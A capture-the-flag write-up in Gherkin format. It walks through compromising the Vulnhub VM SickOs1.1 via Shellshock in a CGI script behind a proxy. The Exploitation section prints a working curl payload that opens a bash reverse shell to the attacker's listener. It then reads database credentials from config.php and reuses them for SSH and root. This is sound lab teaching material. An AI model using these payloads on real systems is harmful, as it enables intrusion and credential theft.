## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnhub
  Location:
   http://10.0.2.10/cgi-bin/status
  CWE:
    CWE-0078: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    REQ.173 Discard unsafe inputs
  Goal:
    Get the remote connection with root privileges
  Recommendation:
    Update the tools with which the environment variables are set up
    and always check them

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Virtual Box     | 6.1           |
    | Kali Linux      | 2020.3        |
    | Firefox         | 68.10.0esr    |
    | arp-scan        | 1.9.7         |
    | nmap            | 7.80          |
    | netcat          | v1.10-41.1+b1 |
    | curl            | 7.68.0        |
    | ssh             | OpenSSH_8.3p1 |
  TOE information:
    Given a file "SickOs1.1-disk1.vmdk"
    When I run it on Virtual Box
    Then I realize that the user is required to log in to the system
    And I turn off the virtual machine
    And I configure the network of Sickos1.1 VM and Kali VM
    Then I turn on the Kali VM and the Sickos1.1 VM
    And I proceed to look for the IPs of the networks with arp-scan
    And this can be seen in [evidence](img1.png)
    And I discover the IP of the Sickos1.1 VM for this case is
    """
    10.0.2.10
    """
    Then I scan with nmap the open ports of Sickos1.1 VM
    And I can see 2 open ports and the port 8080 close
    And this can be seen in [evidence](img2.png)

  Scenario: Normal use case
    Given the open ports of HTTP
    When I assume port 3128 is a proxy to access 8080
    Then I configure the proxy "10.0.2.10:3128" in Firefox
    And this can be seen in [evidence](img3.png)
    And I try to access to http://10.0.2.10:8080 in Firefox
    And I access to a web page
    And this can be seen in [evidence](img4.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I access to http://10.0.2.10/
    When I try to detect site vulnerabilities running
    """
    nikto -h 10.0.2.10 -useproxy 10.0.2.10:3128
    """
    Then I can see that the site has shellshock vulnerability in
    """
    http://10.0.2.10/cgi-bin/status
    """
    And this can be seen in [evidence](img5.png)

  Scenario: Exploitation
    Given I access to http://10.0.2.10
    When I run "nc -nvlp 443" on Kali VM
    Then I take advantage of the shellshock vulnerability
    And I try to get a reverse shell of Sickos1.1 VM running
    """
    curl --header
    "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.0.2.15/443 0>&1"
    --proxy http://10.0.2.10:3128 http://10.0.2.10/cgi-bin/status
    """
    And I get a reverse shell as can be seen in [evidence](img6.png)
    Then I navigate to "/var/www/wolfcms" where the website is hosted
    And I run "ls" to check its content
    And I can see the file "config.php" which could contain credentials
    And this can be seen in [evidence](img7.png)
    When I run "cat config.php" to check its content
    Then I can see the database credentials
    And this can be seen in [evidence](img8.png)
    When I try to use this password to connect me to Sickos1.1 VM by SSH
    Then I connect successfully as can be seen in [evidence](img9.png)
    When I try to get root privileges using the same password running
    """
    sudo su root
    """
    Then I get root privileges successfully
    When I run "ls /root" to check the content of this directory
    Then I can see a file txt
    And I run "cat /root/a0216ea4d51874464078c618298b1367.txt"
    And I get a message that the challenge ends
    And this can be seen in [evidence](img10.png)

  Scenario: Remediation
    When I keep all the external tools that I use updated
    And I do security test to those tools
    Then I avoid many vulnerabilities that could be attack vectors

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.3/10 (Critical) - AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.6/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (High) - CR:L/IR:L/AR:L/MC:H/MI:H/MA:H/

  Scenario: Correlations
    No correlations have been found to this date 2021-04-08
